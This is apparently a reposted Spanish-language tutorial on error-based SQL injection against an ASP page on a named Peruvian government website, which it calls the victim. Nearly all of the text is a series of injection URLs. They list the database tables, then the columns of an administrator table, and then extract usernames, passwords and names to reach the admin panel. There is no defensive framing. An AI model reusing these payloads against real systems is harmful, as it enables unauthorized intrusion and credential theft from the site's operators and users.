TUTORIAL BLIND SQL INYECCION EN ASP

  • Published on
    26-Dec-2014

  • View
    31

  • Download
    2

Transcript

TUTORIAL BLIND SQL INYECCION EN ASP

Iniciamos la consulta a la Web victima www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 table_name from information_schema.tables))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_ge_mof')))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_ge_mof','depurada$')))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_ge_mof','depurada$','dtproperties')))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_ge_mof','depurada$','dtproperties','sysconstraints','syssegments','tbl_ctrl_users','tbl_ estadoCivil','tbl_ge_admin','tbl_ge_certificacion','tbl_ge_ctrlcod','tbl_ge_eventos','tbl_ge _gradacad','tbl_ge_idioma','tbl_ge_instituidioma','tbl_ge_instituprofe','tbl_ge_merito','tb l_ge_niveles','tbl_ge_pais','tbl_ge_plazvac','tbl_ge_programa','tbl_ge_puesto','tbl_ge_tp Usuario','tbl_gedirgen','tbl_geprofesion','tbl_gr_direccion','tbl_ma_experlabo','tbl_ma_id ioma','tbl_ma_personal','tbl_ma_plazvac','tbl_ma_profesion','tbl_ma_reconocimientos')) )--

Trabajamos con la tabla tbl_ge_admin

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_ge_admin'))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_ge_admin' and column_name not in ('str_cdUser')))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_ge_admin' and column_name not in ('str_cdUser','str_nomape')))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_ge_admin' and column_name not in ('str_cdUser','str_nomape','str_cargo')))--

Sacando todas las columnas, estas al ya no haber ms por obtener ya no nos arroja ningn error www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_ge_admin' and column_name not in ('str_cdUser','str_nomape','str_cargo','password','estado','fecinsc')))--

Total columnas : str_cdUser','str_nomape','str_cargo','password','estado','fecinsc

Consultando la tabla www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 str_cdUser from tbl_ge_admin))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 password from tbl_ge_admin))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 str_nomape from tbl_ge_admin))--

Panel de Administracion